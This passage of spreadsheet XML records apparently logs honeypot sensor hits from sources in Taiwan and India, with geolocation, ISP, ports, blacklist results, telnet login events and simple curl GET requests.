    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a74:9ea0"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3669"/>
    <x v="3669"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T22:05:03"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T22:05:03"/>
    <n v="685"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H38&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;29961&amp;&amp;23&amp;&amp;61478&amp;&amp;45405&amp;&amp;NA&amp;&amp;53461&amp;&amp;55319&amp;&amp;42566&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1632"/>
    <s v="120.675"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="tinp"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-12-08"/>
    <s v="TINP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31d5:b695"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3670"/>
    <x v="3670"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:59:20"/>
    <d v="2025-04-01T05:07:41"/>
    <d v="2025-04-01T21:59:20"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2010-02-24"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b639:ef3e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3671"/>
    <x v="3671"/>
    <s v="59-126-151-165.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:57:09"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T21:57:09"/>
    <n v="435"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;17742&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7e:97a5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3672"/>
    <x v="3672"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:49:34"/>
    <d v="2025-04-01T21:49:34"/>
    <d v="2025-04-01T21:49:34"/>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e:8b94"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3673"/>
    <x v="3673"/>
    <s v="220-132-157-172.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:43:14"/>
    <d v="2024-02-02T04:56:00"/>
    <d v="2025-04-01T21:43:14"/>
    <n v="3758"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;34022&amp;&amp;23&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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dc84:9dac"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3674"/>
    <x v="3674"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:33:11"/>
    <d v="2025-04-01T21:14:27"/>
    <d v="2025-04-01T21:33:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2000-01-11"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d00:570f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3675"/>
    <x v="3675"/>
    <s v="220-134-57-61.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:29:16"/>
    <d v="2024-05-27T18:54:18"/>
    <d v="2025-04-01T21:29:16"/>
    <n v="529"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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dc86:393d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3676"/>
    <x v="3676"/>
    <s v="NA&amp;&amp;125-229-89-163.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T21:25:35"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-01T21:25:35"/>
    <n v="361"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;47483"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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7de5:59a3"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3677"/>
    <x v="3677"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:23:27"/>
    <d v="2025-04-01T15:04:29"/>
    <d v="2025-04-01T21:23:27"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:e3a4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3678"/>
    <x v="3678"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:15:23"/>
    <d v="2025-04-01T21:15:23"/>
    <d v="2025-04-01T21:15:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:3540"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3679"/>
    <x v="3679"/>
    <s v="218-161-30-145.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:11:11"/>
    <d v="2024-09-08T07:21:00"/>
    <d v="2025-04-01T21:11:11"/>
    <n v="1284"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;62519&amp;&amp;23&amp;&amp;80&amp;&amp;64874&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2001-10-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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daa1:1e91"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3680"/>
    <x v="3680"/>
    <s v="125-228-61-250.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T21:07:16"/>
    <d v="2024-07-21T08:20:11"/>
    <d v="2025-04-01T21:07:16"/>
    <n v="312"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET"/>
